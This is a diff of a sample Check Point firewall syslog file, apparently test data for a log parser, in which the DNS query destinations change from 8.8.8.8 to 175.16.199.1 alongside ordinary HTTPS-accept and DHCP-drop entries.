-<134>1 2020-03-29T18:12:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50d,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505549"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53773"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50d,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505549"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60019"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50d,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505549"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57758"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50c,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505548"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52064"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50c,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505548"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47527"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50c,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505548"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43245"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505549"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49151"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505549"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44720"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50d,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505549"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33553"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50d,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505549"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53773"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50d,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505549"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60019"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50d,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505549"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57758"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:12:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50d,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.54.41"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52756"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:12:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50d,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"52.49.248.24"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38792"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505550"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40870"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505550"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40870"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:12:30Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e50f,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; service_id:"bootp"; src:"0.0.0.0"]
-<134>1 2020-03-29T18:12:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50e,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505550"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47318"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50e,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505550"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54729"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50e,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505550"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40875"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50e,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505550"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54394"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50e,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505550"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47318"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50e,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505550"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54729"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50e,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505550"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40875"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50e,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505550"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54394"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:12:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50e,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.26.6.155"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58910"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:12:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50e,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"99.86.116.53"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"32852"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505551"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37891"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50f,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505551"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43458"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505551"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37891"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
